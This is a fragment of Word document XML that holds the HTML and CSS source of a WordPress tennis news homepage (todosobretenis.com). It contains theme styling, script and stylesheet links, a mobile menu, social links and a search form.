    <w:p w14:paraId="4A1437B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04AB7F8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4248B33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#mvp-main-nav-small .mvp-fly-but-wrap span,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A1015E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#mvp-main-nav-small .mvp-search-but-wrap span,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56251F5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.mvp-nav-top-left .mvp-fly-but-wrap span,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="693090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#mvp-fly-wrap .mvp-fly-but-wrap span {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07317D7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#555555;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10A643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5569EBC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5B862FB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.mvp-nav-top-right .mvp-nav-search-but,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45E263B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span.mvp-fly-soc-head,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="191744B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.mvp-soc-mob-right i,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CB3B1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#mvp-main-nav-small span.mvp-nav-search-but,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04AFCB0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#mvp-main-nav-small .mvp-nav-menu ul li a  {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="670CFD6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color: #555555;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7862FA5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0829C65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45AB24C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#mvp-main-nav-small .mvp-nav-menu ul li.menu-item-has-children a:after {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51AE44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border-color: #555555 transparent transparent transparent;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="257E1FC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7296C44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1CF5AD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#mvp-nav-top-wrap span.mvp-nav-search-but:hover,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17FE33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#mvp-main-nav-small span.mvp-nav-search-but:hover {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E0DA80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color: #0be6af;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CF3162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54A52C8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5FA9515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#mvp-nav-top-wrap .mvp-fly-but-wrap:hover span,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DA34A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#mvp-main-nav-small .mvp-fly-but-wrap:hover span,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C6767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span.mvp-woo-cart-num:hover {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="260559D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#0be6af;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3653920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3F14D32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1CF47D9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#mvp-main-nav-bot-cont {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A83EE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#ffffff;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6250C9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505236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7D127EE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#mvp-nav-bot-wrap .mvp-fly-but-wrap span,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="499B95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#mvp-nav-bot-wrap .mvp-search-but-wrap span {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70CE95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#000000;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4044097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0D2BF29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6A05AA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#mvp-nav-bot-wrap span.mvp-nav-search-but,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7676333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#mvp-nav-bot-wrap .mvp-nav-menu ul li a {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F96CBE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color: #000000;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4718FC0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2488E78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3277A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#mvp-nav-bot-wrap .mvp-nav-menu ul li.menu-item-has-children a:after {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CA33E6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border-color: #000000 transparent transparent transparent;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D9E7FC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749937F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504883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.mvp-nav-menu ul li:hover a {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09EBB5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border-bottom: 5px solid #0be6af;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="329BD6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1F8416F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2972508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#mvp-nav-bot-wrap .mvp-fly-but-wrap:hover span {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="218857D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background: #0be6af;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="069E6BD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069BA1F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1BA18DE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#mvp-nav-bot-wrap span.mvp-nav-search-but:hover {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FCD6C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color: #0be6af;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26B9CA9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409EAB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222045A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body,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B1D0D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.mvp-feat1-feat-text p,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="348BAA4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.mvp-feat2-top-text p,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D115DB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.mvp-feat3-main-text p,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E44CDC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.mvp-feat3-sub-text p,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40965F9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#searchform input,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63DF2FE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.mvp-author-info-text,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="043E76C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span.mvp-post-excerpt,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B5FAEC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.mvp-nav-menu ul li ul.sub-menu li a,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50C0AC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nav.mvp-fly-nav-menu ul li a,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AB1602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.mvp-ad-label,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51C391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span.mvp-feat-caption,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56A98FC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.mvp-post-tags a,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41FDEBE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.mvp-post-tags a:visited,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4551087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span.mvp-author-box-name a,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50BE928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#mvp-author-box-text p,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A0707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.mvp-post-gallery-text p,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AA838A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ul.mvp-soc-mob-list li span,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="629322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#comments,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41A290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h3#reply-title,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="149D176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h2.comments,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69969F9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#mvp-foot-copy p,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5274EB9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span.mvp-fly-soc-head,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A7E351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.mvp-post-tags-header,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06C70F7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span.mvp-prev-next-label,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DA921D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span.mvp-post-add-link-but,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C843E9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#mvp-comments-button a,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7862595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#mvp-comments-button span.mvp-comment-but-text,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="700A057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ul.product_list_widget span.product-title,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B8197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ul.product_list_widget li a,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="458EA2A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#reviews #comments ol.commentlist li .comment-text p.meta,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C03A5B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div.product p.price,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02F8E8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div.product p.price ins,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="220D5DB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div.product p.price del,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75D1DC9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ul.products li.product .price del,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F09C31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ul.products li.product .price ins,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="048EF30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ul.products li.product .price,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B0EE0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#respond input#submit,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04B785D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a.button,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F960E2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button.button,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AA8C1F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input.button,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0726AAA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.widget_price_filter .price_slider_amount .button,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="716D94C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span.onsale,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13F21E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.woocommerce-review-link,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A8B6D0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#woo-content p.woocommerce-result-count,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61E282E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div.product .woocommerce-tabs ul.tabs li a,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49C4BE3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a.mvp-inf-more-but,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BC15BA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>span.mvp-cont-read-but,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63E7020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span.mvp-cd-cat,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3046460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span.mvp-cd-date,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12FA23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.mvp-feat4-main-text p,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="212A601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span.mvp-woo-cart-num,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71B49DD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span.mvp-widget-home-title2,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3917C1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.wp-caption,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F69420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p.wp-caption-text,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6416A70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.gallery-caption,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5413E43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.mvp-post-add-main p.wp-caption-text,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A26A57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#bbpress-forums,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57A6826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#bbpress-forums p,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29E557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.protected-post-form input,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E57B84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#mvp-feat6-text p {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66465BA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font-family: 'Roboto', sans-serif;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="343715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4037DEB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A680C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.mvp-blog-story-text p,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44C15F5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span.mvp-author-page-desc,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="497327C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#mvp-404 p,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61CAE13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.mvp-widget-feat1-bot-text p,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F2E59C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.mvp-widget-feat2-left-text p,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7037625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.mvp-flex-story-text p,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17C37F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.mvp-search-text p,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41F706D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p,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CCE08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.mvp-post-add-main p,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="471A78E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.rwp-summary,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D9E43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.rwp-u-review__comment,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B8A244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.mvp-feat5-mid-main-text p,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D9E1F5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.mvp-feat5-small-main-text p {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56262AB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font-family: 'PT Serif', sans-serif;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1142B3D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46F8DE8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547E6C3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.mvp-nav-menu ul li a,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="110B2FA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#mvp-foot-menu ul li a {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="753035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font-family: 'Oswald', sans-serif;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="558201F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779221B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C236FA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67EFF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.mvp-feat1-sub-text h2,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="412E2C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.mvp-feat1-pop-text h2,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="237C632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.mvp-feat1-list-text h2,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75F541A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.mvp-widget-feat1-top-text h2,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CE3DBF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.mvp-widget-feat1-bot-text h2,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C7A4CC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.mvp-widget-dark-feat-text h2,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AE1258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.mvp-widget-dark-sub-text h2,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A6A33D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.mvp-widget-feat2-left-text h2,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="375494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.mvp-widget-feat2-right-text h2,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42D3DB4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.mvp-blog-story-text h2,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="549149B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.mvp-flex-story-text h2,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64C6513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.mvp-vid-wide-more-text p,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2726935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.mvp-prev-next-text p,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DEFE4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.mvp-related-text,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="472C1E8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.mvp-post-more-text p,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="029CAB0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h2.mvp-authors-latest a,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F5A71B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.mvp-feat2-bot-text h2,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BC9D74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.mvp-feat3-sub-text h2,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="695455B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.mvp-feat3-main-text h2,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6369640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.mvp-feat4-main-text h2,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D2E9DB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.mvp-feat5-text h2,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="606501B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.mvp-feat5-mid-main-text h2,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DFED47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.mvp-feat5-small-main-text h2,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5428D7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.mvp-feat5-mid-sub-text h2,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DE1462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#mvp-feat6-text h2 {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="064C7C5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font-family: 'Oswald', sans-serif;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F4BD8D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5BCAC73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0D4A30C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.mvp-feat2-top-text h2,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="723EE07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.mvp-feat1-feat-text h2,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7135433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h1.mvp-post-title,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="235F774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h1.mvp-post-title-wide,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="206EEB5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.mvp-drop-nav-title h4,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A46D2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blockquote p,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A14C1A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.mvp-post-add-main blockquote p,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3955FB2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#mvp-404 h1,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="329219E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#woo-content h1.page-title,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29F8BF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div.product .product_title,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46D108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ul.products li.product h3 {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C4D7F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font-family: 'Oswald', sans-serif;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="241D044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0839252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1353267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span.mvp-feat1-pop-head,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77F70F7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.mvp-feat1-pop-text:before,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C188A6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span.mvp-feat1-list-but,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3482E40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span.mvp-widget-home-title,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C73442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.mvp-widget-feat2-side-more,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D0B457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span.mvp-post-cat,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0473EAC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span.mvp-page-head,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E01946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h1.mvp-author-top-head,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DA706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.mvp-authors-name,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BA91AD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h1,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4176F79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h2,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C05BED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h3,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="537612A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h4,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73B7138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h5,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5175AB2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#mvp-content-main h6,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A33506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.related h2,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DA1695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div.product .woocommerce-tabs .panel h2,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="045255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.woocommerce div.product .product_title,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="659644B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.mvp-feat5-side-list .mvp-feat1-list-img:after {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50D61A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font-family: 'Roboto', sans-serif;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40B5706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0BA6086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7B9CD08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</w:p>
    <w:p w14:paraId="49F8899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5EC3F2E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#mvp-leader-wrap {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E4B2BF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position: relative;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44E3641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6283EF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#mvp-site-main {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A7847A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margin-top: 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7361CC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0A02523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#mvp-leader-wrap {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1619D4E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top: 0 !important;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7808E3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0809BA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</w:p>
    <w:p w14:paraId="7834068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7EEC2A0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.mvp-nav-links {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45157AC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display: none;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6414FB1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13F17B6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</w:p>
    <w:p w14:paraId="32189E7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&lt;/style&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75836EC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rel='stylesheet' id='mvp-reset-css'  href='http://todosobretenis.com/wp-content/themes/zox-news/css/reset.css?ver=4.9.18' type='text/css' media='all' /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E3EA42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rel='stylesheet' id='fontawesome-css'  href='http://todosobretenis.com/wp-content/themes/zox-news/font-awesome/css/font-awesome.css?ver=4.9.18' type='text/css' media='all' /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="542D86B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rel='stylesheet' id='mvp-fonts-css'  href='//fonts.googleapis.com/css?family=Advent+Pro%3A700%26subset%3Dlatin%2Clatin-ext%2Ccyrillic%2Ccyrillic-ext%2Cgreek-ext%2Cgreek%2Cvietnamese%7COpen+Sans%3A700%26subset%3Dlatin%2Clatin-ext%2Ccyrillic%2Ccyrillic-ext%2Cgreek-ext%2Cgreek%2Cvietnamese%7CAnton%3A400%26subset%3Dlatin%2Clatin-ext%2Ccyrillic%2Ccyrillic-ext%2Cgreek-ext%2Cgreek%2Cvietnamese%7COswald%3A100%2C200%2C300%2C400%2C500%2C600%2C700%2C800%2C900%26subset%3Dlatin%2Clatin-ext%2Ccyrillic%2Ccyrillic-ext%2Cgreek-ext%2Cgreek%2Cvietnamese%7COswald%3A100%2C200%2C300%2C400%2C500%2C600%2C700%2C800%2C900%26subset%3Dlatin%2Clatin-ext%2Ccyrillic%2Ccyrillic-ext%2Cgreek-ext%2Cgreek%2Cvietnamese%7CRoboto%3A100%2C200%2C300%2C400%2C500%2C600%2C700%2C800%2C900%26subset%3Dlatin%2Clatin-ext%2Ccyrillic%2Ccyrillic-ext%2Cgreek-ext%2Cgreek%2Cvietnamese%7CRoboto%3A100%2C200%2C300%2C400%2C500%2C600%2C700%2C800%2C900%26subset%3Dlatin%2Clatin-ext%2Ccyrillic%2Ccyrillic-ext%2Cgreek-ext%2Cgreek%2Cvietnamese%7CPT+Serif%3A100%2C200%2C300%2C400%2C500%2C600%2C700%2C800%2C900%26subset%3Dlatin%2Clatin-ext%2Ccyrillic%2Ccyrillic-ext%2Cgreek-ext%2Cgreek%2Cvietnamese%7COswald%3A100%2C200%2C300%2C400%2C500%2C600%2C700%2C800%2C900%26subset%3Dlatin%2Clatin-ext%2Ccyrillic%2Ccyrillic-ext%2Cgreek-ext%2Cgreek%2Cvietnamese' type='text/css' media='all' /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="719562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rel='stylesheet' id='mvp-media-queries-css'  href='http://todosobretenis.com/wp-content/themes/zox-news/css/media-queries.css?ver=4.9.18' type='text/css' media='all' /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AFF5A7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 src='http://todosobretenis.com/wp-includes/js/jquery/jquery.js?ver=1.12.4'&gt;&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="013F0D8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 src='http://todosobretenis.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1'&gt;&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AF7D78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 src='http://todosobretenis.com/wp-content/plugins/stop-user-enumeration/frontend/js/frontend.js?ver=1.3.15'&gt;&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41133E5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rel='https://api.w.org/' href='http://todosobretenis.com/wp-json/' /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A4A6F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rel="EditURI" type="application/rsd+xml" title="RSD" href="http://todosobretenis.com/xmlrpc.php?rsd" /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="349DFBC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&lt;link rel="wlwmanifest" type="application/wlwmanifest+xml" href="http://todosobretenis.com/wp-includes/wlwmanifest.xml" /&gt; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BD0CA5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&lt;meta name="generator" content="WordPress 4.9.18" /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03EF95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rel='shortlink' href='http://todosobretenis.com/' /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="195A0D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rel="alternate" type="application/json+oembed" href="http://todosobretenis.com/wp-json/oembed/1.0/embed?url=http%3A%2F%2Ftodosobretenis.com%2F" /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EB3E5D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&lt;link rel="alternate" type="text/xml+oembed" href="http://todosobretenis.com/wp-json/oembed/1.0/embed?url=http%3A%2F%2Ftodosobretenis.com%2F&amp;#038;format=xml" /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="468570C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&lt;/head&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0845407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&lt;body class="home page-template page-template-page-home page-template-page-home-php page page-id-79"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63C5EBF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id="mvp-fly-wrap"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AFA566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id="mvp-fly-menu-top" class="left relative"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30D232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class="mvp-fly-top-out left relative"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AD899C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class="mvp-fly-top-in"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3290906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id="mvp-fly-logo" class="left relative"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F00BE3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href="http://todosobretenis.com/"&gt;&lt;img src="http://todosobretenis.com/wp-content/uploads/2019/01/tstchico.png" alt="Todo Sobre Tenis" data-rjs="2" /&gt;&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A8D6AE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&lt;/div&gt;&lt;!--mvp-fly-logo--&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E4A87D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&lt;/div&gt;&lt;!--mvp-fly-top-in--&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C4B1DB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class="mvp-fly-but-wrap mvp-fly-but-menu mvp-fly-but-click"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28C0268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6E9337E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20D556F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3377044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77ECB00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&lt;/div&gt;&lt;!--mvp-fly-but-wrap--&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E29BCE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&lt;/div&gt;&lt;!--mvp-fly-top-out--&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3240EB5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&lt;/div&gt;&lt;!--mvp-fly-menu-top--&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F9076D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id="mvp-fly-menu-wrap"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="642CE07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&lt;nav class="mvp-fly-nav-menu left relative"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28AC09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class="menu-mobila-container"&gt;&lt;ul id="menu-mobila" class="menu"&gt;&lt;li id="menu-item-1619" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-home current-menu-item page_item page-item-79 current_page_item menu-item-1619"&gt;&lt;a href="http://todosobretenis.com/"&gt;Home&lt;/a&gt;&lt;/li&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AF640C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 id="menu-item-1620" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1620"&gt;&lt;a href="http://todosobretenis.com/escribi-en-la-web/"&gt;EscribÃ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 xml:space="preserve"> en la web&lt;/a&gt;&lt;/li&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="042010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 id="menu-item-1621" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1621"&gt;&lt;a href="http://todosobretenis.com/anuncia-en-tst/"&gt;Anuncia en TST&lt;/a&gt;&lt;/li&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D16680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 id="menu-item-1622" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1622"&gt;&lt;a href="http://todosobretenis.com/sobre-nosotros/"&gt;Sobre Nosotros&lt;/a&gt;&lt;/li&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FA178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&lt;/ul&gt;&lt;/div&gt;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&lt;/nav&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30AA337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&lt;/div&gt;&lt;!--mvp-fly-menu-wrap--&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C85E5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id="mvp-fly-soc-wrap"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07CCD2F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class="mvp-fly-soc-head"&gt;Conectate con nosotros&lt;/span&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57C5449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&lt;ul class="mvp-fly-soc-list left relative"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45E6057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&lt;li&gt;&lt;a href="http://facebook.com/todosobretenis" target="_blank" class="fa fa-facebook fa-2"&gt;&lt;/a&gt;&lt;/li&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="246B81B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&lt;li&gt;&lt;a href="https://twitter.com/Tsobretenis" target="_blank" class="fa fa-twitter fa-2"&gt;&lt;/a&gt;&lt;/li&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B5B1B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&lt;li&gt;&lt;a href="https://www.instagram.com/todosobretenis/?hl=es" target="_blank" class="fa fa-instagram fa-2"&gt;&lt;/a&gt;&lt;/li&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01321A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&lt;/ul&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A242B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&lt;/div&gt;&lt;!--mvp-fly-soc-wrap--&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58A7F1A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&lt;/div&gt;&lt;!--mvp-fly-wrap--&gt;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id="mvp-site" class="left relative"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DEE7DD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id="mvp-search-wrap"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="015E89B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id="mvp-search-box"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22D5AE1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&lt;form method="get" id="searchform" action="http://todosobretenis.com/"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A853B5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&lt;input type="text" name="s" id="s" value="Buscar" onfocus='if (this.value == "Buscar") { this.value = ""; }' onblur='if (this.value == "") { this.value = "Buscar"; }' /&gt;</w:t>
      </w:r>
    </w:p>
